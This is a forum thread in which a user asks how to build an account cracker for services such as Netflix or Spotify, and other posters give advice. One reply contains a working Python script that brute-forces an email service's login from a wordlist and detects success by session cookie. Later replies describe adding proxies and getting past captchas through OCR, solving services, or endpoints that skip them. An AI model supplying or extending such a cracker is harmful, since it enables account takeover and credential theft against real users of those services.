K4LI (12-19-2016)
Hello everyone, I want to code an account cracker for netflix or spotify or whatever for educational purposes ( I know sentry mba exist that's why it's educational) to understand how it's done and what libs and functions to use. I know the basic syntax and have some knowledge of python 3, javascript, C# and C++. I have looked around on the internet for some info, but since cracking accounts isn't actually very legal I didn't find much about which language is best to do such a thing and besides there are tools coded in C#, C++ and python so I don't know which to use. It's probably partly preference but what is the best language to code an account cracker in ? and what are the libs/functions I need to use. btw I am using a mac so windows.h and that kinda stuff in c++ doesn't work. Also, is perl worth learning for cracking ?
Thank you for reading and helping me out <3
Last edited by BlueCow; 12-18-2016 at 02:49 PM. Reason: added some info.
K4LI (12-19-2016)
Cool! Good luck and keep us updated!
Alright, so I'm not sure about this I think I should start off by using the cURL library : website
I'm gonna try to use this to visit a web page, enter some values stored in variables and retrieve information on the webpage to see if the credentials are valid or not. Also, for those on Windows that are using Visual Studio I found a good text tutorial that explains how to install, link, include and use libcurl, you can find it here.
I'm not an awesome programmer so I might fail but it looks like cURL can do all of this.
Last edited by BlueCow; 12-22-2016 at 03:08 AM.
honestly most of the time these shitty crackers people sell are coded in vb. personally i think vb is the pussy of coding but whatever. you should be fine with any .net languages so c# would also be fine. GL with cURL i havent done anything with that before
Last edited by MaxGen; 12-30-2016 at 02:34 PM.
BlueCow (01-04-2017)
I'd go python. Its a super easy language to write a brute forcer in. Here's an example of one I wrote for an email service. No proxy support or captcha bypass though. Just a basic example.
Code:import requests, sys from bs4 import BeautifulSoup ses = requests.Session() login = ses.get('https://www.gm*****.uk/#.1730818-header-navlogin2-1') soup_login = BeautifulSoup(login.content, 'html5lib').find('form').find_all('input') loginDict = {} for u in soup_login: if u.has_attr('value'): loginDict[u['name']] = u['value'] loginDict['username'] = 'hackmereddit@gm*****.uk' with open('dict.txt', 'r') as dict: for word in dict: word = word.strip() loginDict['password'] = word resp = ses.post('https://login.gm*****.uk/login', data=loginDict) print(word) if '.navigator-bs.gm*****.uk' in resp.cookies.list_domains(): print(word) print(resp.cookies) sys.exit()
Yeah its relatively easy to add socks proxy support. Captcha bypassing is harder though. There are OCR libraries that can bypass basic captcha, but if they use recaptcha you'll have to go with a service like DeathByacapthca, but thats the same for every language.
A large part of bypassing captchas is finding a way to make the web app not require it. I think I found something for steam but I need to keep testing, and I've definitely found one for neopets lol.
Last edited by Nimboso; 01-04-2017 at 12:45 PM.
BlueCow (01-05-2017)
New
Current Project:
SimpleExaltHack
Outdated stuff I made in the past:
Famebot
Clientless tradebot
RotMG ping checker
Zautonexus crack
So, I think I'm gonna go for pyhton and try to make a v1 without proxies and if it turns out not too bad I'll make a v2. Thanks for your help guys ! Btw, I'm on mac and I was thinking of going for Pycharm as the IDE (https://www.jetbrains.com/pycharm/?fromMenu) does anyone know if it's good or if I should use something else ? Thanks !!
BlueCow (01-08-2017)